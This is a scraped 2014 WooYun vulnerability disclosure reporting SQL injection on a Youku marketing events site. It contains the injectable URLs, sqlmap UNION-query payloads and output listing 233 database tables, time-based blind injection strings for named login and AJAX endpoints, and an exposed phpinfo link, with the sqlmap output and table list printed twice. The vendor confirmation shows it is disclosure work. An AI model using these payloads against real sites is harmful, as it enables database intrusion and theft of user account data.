优酷某站SQL注入点一枚 | WooYun-2014-52448

漏洞概要关注数(2) 关注此漏洞

缺陷编号： WooYun-2014-52448

漏洞标题：优酷某站SQL注入点一枚

漏洞作者： Mr .LZH

提交时间： 2014-03-01 20:01

公开时间： 2014-04-15 20:02

漏洞类型： SQL注射漏洞

危害等级：中

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

0人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-01：细节已通知厂商并且等待厂商处理中
2014-03-01：厂商已经确认，细节仅向厂商公开
2014-03-11：细节向核心白帽子及相关领域专家公开
2014-03-21：细节向普通白帽子公开
2014-03-31：细节向实习白帽子公开
2014-04-15：细节向公众公开

简要描述：

优酷某活动站注入，大量参加活动的用户帐号信息泄露。
== 叫你们想占便宜

详细说明：

注入点：events.youku.com/2011/pepsihappyness/api/?act=my_ecards&page=1&pagesize=4&pageslists=%23ecards_pageslists&pagesturn=%23ecards_pagesturn&url=api/%3Fact%3Dmy_ecards%26uid%3D34853&uid=1

注入参数：uid

code 区域

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


---


Place: GET


Parameter: uid


    Type: UNION query


    Title: MySQL UNION query (NULL) - 1 to 10 columns


    Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#


---





available databases [3]:


[*] db_events


[*] information_schema


[*] test





sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


---


Place: GET


Parameter: uid


    Type: UNION query


    Title: MySQL UNION query (NULL) - 1 to 10 columns


    Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#


---





Database: db_events


[233 tables]


+--------------------------+


| 7up_user                 |


| adidas_2010_football     |


| adidas_2011_tvc_info     |


| adidas_comments          |


| aveo_clicks              |


| aveo_comments            |


| aveo_users               |


| bosideng_1024_users      |


| bosideng_code            |


| bosideng_fake_users      |


| bosideng_photos          |


| bosideng_users           |


| bosideng_video_vote_logs |


| bosideng_videos          |


| bosideng_vote_logs       |


| bsd_kpi_email            |


| bsd_kpi_user             |


| bsd_rt_log               |


| bsd_user                 |


| bugles_videos            |


| casesharing_2013         |


| cgirl2014_awards         |


| chengxin_news            |


| chery_comments           |


| chery_photo_vote_logs    |


| chery_photos             |


| chery_users              |


| chery_video_vote_logs    |


| chery_videos             |


| cityshow_comment         |


| cityshow_data            |


| cityshow_member          |


| clear_game_log           |


| clear_log                |


| clear_rt_log             |


| clear_users              |


| crowneplaza_register     |


| deyi_tickets_users       |


| dove_user                |


| dove_video               |


| etam_comment             |


| etam_txt                 |


| fiesta_2011_guestbook    |


| fm_dream                 |


| fm_kpi_member            |


| fm_number                |


| fm_number_bak            |


| fm_number_t              |


| fm_number_test           |


| fm_support_log           |


| fm_user                  |


| fm_vote_log              |


| fm_work                  |


| global_accounts          |


| global_china             |


| global_files             |


| global_minisites         |


| global_testing           |


| global_units             |


| greetingcard_params      |


| gucci_comments           |


| gucci_rt_logs            |


| gucci_users              |


| hkdl_users               |


| ht_config                |


| ht_guest                 |


| ht_user                  |


| htc_config               |


| hvsop2013_awards         |


| hvsop_comments           |


| hvsop_live_email         |


| hvsop_resumes            |


| hvsop_users              |


| hvsop_videos             |


| hvsop_vote_logs          |


| icedew_videos            |


| jasmine_comments         |


| jw2ask_marked            |


| jw2ask_plans             |


| jw2ask_questions         |


| jw2ask_same_q            |


| jw2ask_top30_grade_logs  |


| kohler_comments          |


| kohler_mm_awards         |


| kohler_photo_vote_logs   |


| kohler_photos            |


| kohler_prize_logs        |


| kohler_users             |


| kohler_video_vote_logs   |


| kohler_videos            |


| lee_moment_photos        |


| lee_moment_votelog       |


| levis_data               |


| levis_logs               |


| levis_win                |


| loreal_flash_ad          |


| mabelline_users          |


| mamonde_2013_videos      |


| market_huanzhu_votes     |


| marketing_apply_info     |


| marketing_darenxiu       |


| marketing_fashion        |


| marketing_jianjiancao    |


| marketing_kfc_avatar     |


| marketing_kfc_cms        |


| marketing_laifushi       |


| marketing_upload_info    |


| mql_award                |


| mql_seckill              |


| mql_seckill_bak          |


| mql_seckill_log          |


| nikegz_comments          |


| nikegz_image             |


| nikegz_pks               |


| nikegz_videos            |


| nivea_answer_logs        |


| nivea_awards             |


| nivea_final_awards       |


| nivea_photos             |


| nivea_question           |


| nivea_users              |


| nivea_vote_logs          |


| onstar_regist            |


| onstar_video             |


| oreo_images              |


| oreo_videos              |


| pepsi_comments           |


| pepsi_ecards             |


| pepsi_media              |


| pepsi_users              |


| pepsi_videos             |


| pepsi_vote_logs          |


| pepsicny_videos          |


| qingyang_comment         |


| qingyang_videos          |


| remyvsop_banner          |


| remyvsop_comment         |


| remyvsop_mobile          |


| remyvsop_news            |


| remyvsop_register        |


| remyvsop_teams           |


| remyvsop_videos          |


| ricola_pincode           |


| ricola_tickets           |


| roewe_comment            |


| roewe_config             |


| roewe_guess              |


| roewe_player             |


| roewe_user               |


| scj_users                |


| sprite_users             |


| sprite_videos            |


| superb_comments          |


| superb_comments_bak      |


| superb_videos            |


| sww_2011_users           |


| sww_2011_videos          |


| unit_cachedata           |


| unit_comments            |


| unit_misc                |


| unit_news                |


| unit_users               |


| unit_videos              |


| unit_visitors            |


| unit_voting              |


| vichy2013_awards         |


| vichy2013_winners        |


| videos_bak               |


| vsop_email               |


| vsop_live_mobile         |


| vsop_loop_videos         |


| vsop_lyp                 |


| vsop_users               |


| vsop_videos              |


| vsop_vote_email          |


| wtcc_2011_guestbook      |


| wtcc_2011_shots          |


| wtcc_2011_users          |


| wzmt_awards              |


| wzmt_awards_bak          |


| wzmt_seckill             |


| wzmt_seckill_log         |


| z_acer_user              |


| z_bwnzb_user             |


| z_eleven_user            |


| z_fanta                  |


| z_fanta_email            |


| z_ferrari                |


| z_ferrero_user           |


| z_huggies                |


| z_huggies_comments       |


| z_k3                     |


| z_k3_user                |


| z_k3_v                   |


| z_lenscrafter_pic        |


| z_lenscrafter_user       |


| z_loreal                 |


| z_market_disney          |


| z_market_topchef         |


| z_proya2011_100          |


| z_proya2011_code         |


| z_proya2011_mblog        |


| z_proya2011_pic          |


| z_proya2011_user         |


| z_proya2011_v2_pic       |


| z_proya2011_v2_user      |


| z_proya_pic              |


| z_proya_user             |


| z_remyclub_comment       |


| z_remyclub_user          |


| z_riich_user             |


| z_sdeer_user             |


| z_sepb_user              |


| z_sgm15th                |


| z_volvo                  |


| z_wp_code                |


| z_young                  |


| z_z_comment              |


| z_z_contact              |


| z_z_contact2             |


| z_z_email                |


| z_z_img                  |


| z_z_luck                 |


| z_z_module_luck          |


| z_z_p                    |


| z_z_txt                  |


| z_z_txt_vote             |


| z_z_v                    |


| z_z_vote                 |


| z_z_vote_id              |


| z_z_vote_ip              |


| zhijue_users             |


| zqbb_videos              |


+--------------------------+

呵呵，还有几个post注入点，但是用常用工具无法注出结果，但通过时间延迟可以确定存在。

http://events.youku.com/bwnzb/api/_login.php

uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e

http://events.youku.com/bwnzb/phase-2/api/_login.php

uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e

http://events.youku.com/familymart/api/?q=ajax/doSupport

type=(select(sleep(3))v)&work_id=24526

或者type=test&work_id=(select(sleep(3))v)

附送一个phpinfo

http://events.youku.com/2010/wtcc/phpinfo.php

漏洞证明：

code 区域

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


---


Place: GET


Parameter: uid


    Type: UNION query


    Title: MySQL UNION query (NULL) - 1 to 10 columns


    Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#


---





available databases [3]:


[*] db_events


[*] information_schema


[*] test





sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


---


Place: GET


Parameter: uid


    Type: UNION query


    Title: MySQL UNION query (NULL) - 1 to 10 columns


    Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#


---





Database: db_events


[233 tables]


+--------------------------+


| 7up_user                 |


| adidas_2010_football     |


| adidas_2011_tvc_info     |


| adidas_comments          |


| aveo_clicks              |


| aveo_comments            |


| aveo_users               |


| bosideng_1024_users      |


| bosideng_code            |


| bosideng_fake_users      |


| bosideng_photos          |


| bosideng_users           |


| bosideng_video_vote_logs |


| bosideng_videos          |


| bosideng_vote_logs       |


| bsd_kpi_email            |


| bsd_kpi_user             |


| bsd_rt_log               |


| bsd_user                 |


| bugles_videos            |


| casesharing_2013         |


| cgirl2014_awards         |


| chengxin_news            |


| chery_comments           |


| chery_photo_vote_logs    |


| chery_photos             |


| chery_users              |


| chery_video_vote_logs    |


| chery_videos             |


| cityshow_comment         |


| cityshow_data            |


| cityshow_member          |


| clear_game_log           |


| clear_log                |


| clear_rt_log             |


| clear_users              |


| crowneplaza_register     |


| deyi_tickets_users       |


| dove_user                |


| dove_video               |


| etam_comment             |


| etam_txt                 |


| fiesta_2011_guestbook    |


| fm_dream                 |


| fm_kpi_member            |


| fm_number                |


| fm_number_bak            |


| fm_number_t              |


| fm_number_test           |


| fm_support_log           |


| fm_user                  |


| fm_vote_log              |


| fm_work                  |


| global_accounts          |


| global_china             |


| global_files             |


| global_minisites         |


| global_testing           |


| global_units             |


| greetingcard_params      |


| gucci_comments           |


| gucci_rt_logs            |


| gucci_users              |


| hkdl_users               |


| ht_config                |


| ht_guest                 |


| ht_user                  |


| htc_config               |


| hvsop2013_awards         |


| hvsop_comments           |


| hvsop_live_email         |


| hvsop_resumes            |


| hvsop_users              |


| hvsop_videos             |


| hvsop_vote_logs          |


| icedew_videos            |


| jasmine_comments         |


| jw2ask_marked            |


| jw2ask_plans             |


| jw2ask_questions         |


| jw2ask_same_q            |


| jw2ask_top30_grade_logs  |


| kohler_comments          |


| kohler_mm_awards         |


| kohler_photo_vote_logs   |


| kohler_photos            |


| kohler_prize_logs        |


| kohler_users             |


| kohler_video_vote_logs   |


| kohler_videos            |


| lee_moment_photos        |


| lee_moment_votelog       |


| levis_data               |


| levis_logs               |


| levis_win                |


| loreal_flash_ad          |


| mabelline_users          |


| mamonde_2013_videos      |


| market_huanzhu_votes     |


| marketing_apply_info     |


| marketing_darenxiu       |


| marketing_fashion        |


| marketing_jianjiancao    |


| marketing_kfc_avatar     |


| marketing_kfc_cms        |


| marketing_laifushi       |


| marketing_upload_info    |


| mql_award                |


| mql_seckill              |


| mql_seckill_bak          |


| mql_seckill_log          |


| nikegz_comments          |


| nikegz_image             |


| nikegz_pks               |


| nikegz_videos            |


| nivea_answer_logs        |


| nivea_awards             |


| nivea_final_awards       |


| nivea_photos             |


| nivea_question           |


| nivea_users              |


| nivea_vote_logs          |


| onstar_regist            |


| onstar_video             |


| oreo_images              |


| oreo_videos              |


| pepsi_comments           |


| pepsi_ecards             |


| pepsi_media              |


| pepsi_users              |


| pepsi_videos             |


| pepsi_vote_logs          |


| pepsicny_videos          |


| qingyang_comment         |


| qingyang_videos          |


| remyvsop_banner          |


| remyvsop_comment         |


| remyvsop_mobile          |


| remyvsop_news            |


| remyvsop_register        |


| remyvsop_teams           |


| remyvsop_videos          |


| ricola_pincode           |


| ricola_tickets           |


| roewe_comment            |


| roewe_config             |


| roewe_guess              |


| roewe_player             |


| roewe_user               |


| scj_users                |


| sprite_users             |


| sprite_videos            |


| superb_comments          |


| superb_comments_bak      |


| superb_videos            |


| sww_2011_users           |


| sww_2011_videos          |


| unit_cachedata           |


| unit_comments            |


| unit_misc                |


| unit_news                |


| unit_users               |


| unit_videos              |


| unit_visitors            |


| unit_voting              |


| vichy2013_awards         |


| vichy2013_winners        |


| videos_bak               |


| vsop_email               |


| vsop_live_mobile         |


| vsop_loop_videos         |


| vsop_lyp                 |


| vsop_users               |


| vsop_videos              |


| vsop_vote_email          |


| wtcc_2011_guestbook      |


| wtcc_2011_shots          |


| wtcc_2011_users          |


| wzmt_awards              |


| wzmt_awards_bak          |


| wzmt_seckill             |


| wzmt_seckill_log         |


| z_acer_user              |


| z_bwnzb_user             |


| z_eleven_user            |


| z_fanta                  |


| z_fanta_email            |


| z_ferrari                |


| z_ferrero_user           |


| z_huggies                |


| z_huggies_comments       |


| z_k3                     |


| z_k3_user                |


| z_k3_v                   |


| z_lenscrafter_pic        |


| z_lenscrafter_user       |


| z_loreal                 |


| z_market_disney          |


| z_market_topchef         |


| z_proya2011_100          |


| z_proya2011_code         |


| z_proya2011_mblog        |


| z_proya2011_pic          |


| z_proya2011_user         |


| z_proya2011_v2_pic       |


| z_proya2011_v2_user      |


| z_proya_pic              |


| z_proya_user             |


| z_remyclub_comment       |


| z_remyclub_user          |


| z_riich_user             |


| z_sdeer_user             |


| z_sepb_user              |


| z_sgm15th                |


| z_volvo                  |


| z_wp_code                |


| z_young                  |


| z_z_comment              |


| z_z_contact              |


| z_z_contact2             |


| z_z_email                |


| z_z_img                  |


| z_z_luck                 |


| z_z_module_luck          |


| z_z_p                    |


| z_z_txt                  |


| z_z_txt_vote             |


| z_z_v                    |


| z_z_vote                 |


| z_z_vote_id              |


| z_z_vote_ip              |


| zhijue_users             |


| zqbb_videos              |


+--------------------------+

修复方案：

版权声明：转载请注明来源 Mr .LZH@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-03-01 20:08

厂商回复：

多谢提醒，马上修复

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

评价

登录后才能发表评论，请先登录。

WooYun.org

漏洞概要关注数(2) 关注此漏洞

缺陷编号： WooYun-2014-52448

漏洞标题：优酷某站SQL注入点一枚

相关厂商：优酷

漏洞作者： Mr .LZH

提交时间： 2014-03-01 20:01

公开时间： 2014-04-15 20:02

漏洞类型： SQL注射漏洞

危害等级：中

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

0人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Mr .LZH@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(少于3人评价):

登陆后才能进行评分

评价

WooYun.org

漏洞概要 关注数(2) 关注此漏洞

缺陷编号： WooYun-2014-52448

漏洞标题： 优酷某站SQL注入点一枚

相关厂商： 优酷

漏洞作者： Mr .LZH

提交时间： 2014-03-01 20:01

公开时间： 2014-04-15 20:02

漏洞类型： SQL注射漏洞

危害等级： 中

自评Rank： 15

漏洞状态： 厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： 无

0人收藏 收藏 var token=""; var id="52448"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Mr .LZH@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(少于3人评价): 登陆后才能进行评分

评价

漏洞概要关注数(2) 关注此漏洞

漏洞标题：优酷某站SQL注入点一枚

相关厂商：优酷

危害等级：中

漏洞状态：厂商已经确认

Tags标签：无

0人收藏收藏
分享漏洞：

漏洞评价(少于3人评价):

登陆后才能进行评分